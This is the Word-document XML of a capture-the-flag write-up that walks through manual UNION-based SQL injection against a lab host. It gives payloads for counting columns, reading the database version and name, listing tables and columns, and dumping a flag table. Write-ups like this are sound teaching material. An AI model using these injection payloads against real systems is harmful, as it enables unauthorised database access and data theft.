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jc w:val="cente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0A">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objective of the challenge is to obtain the flag that is inside the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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starting the container, we receive the IP address </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.0.25/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">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site:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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35300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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F">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I will identify the number of columns in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'union select 1,2,3;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>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4521200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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 results, let’s increase the number of columns to see if we get a response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'union select 1,2,3,4;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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381500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Alright, apparently we have 4 columns, and the number 2 was reflected. We will use column 2 to retrieve information from the database. I will use a command to check which database version is being used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'union select 1,@@version,3,4;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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559300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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result of the query is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3.27-Maria-DB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now we will retrieve the database name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'union select 1,database(),3,4;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4648200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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now have the database name. Next, we need the names of the tables in this database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'union select 1,table_name,3,4 from information_schema.tables where table_schema = 'cs';#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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08400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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two tables: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">products</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1">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table that interests us is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table, so we will list the columns of that table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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'union select 1,column_name,3,4 from information_schema.columns where table_name = 'flag';#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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32200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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For us, the column that matters is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will retrieve the value of that column:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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'union select 1,name,3,4 from flag;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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597400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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have our flag. By viewing the page source, we can see it more clearly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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Ctrl+U</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pP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597400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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B">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C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId18" w:type="default"/>
      <w:headerReference r:id="rId19" w:type="first"/>
      <w:headerReference r:id="rId20" w:type="even"/>
      <w:footerReference r:id="rId21" w:type="default"/>
      <w:footerReference r:id="rId22" w:type="first"/>
      <w:footerReference r:id="rId23"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2E">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="3"/>
    <w:bookmarkEnd w:id="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60" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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2F">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30">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0.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5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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SQL </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Injection</w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> Manual</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0.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3.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.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M0GdPBRgMBGRThFeBJRFkuCSPA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmguMTc1ZjVjczk0ejBvOAByITFFd1k5UVBwVlgzZWZtY19lMUtJRGduM3lreldIMVBSWA==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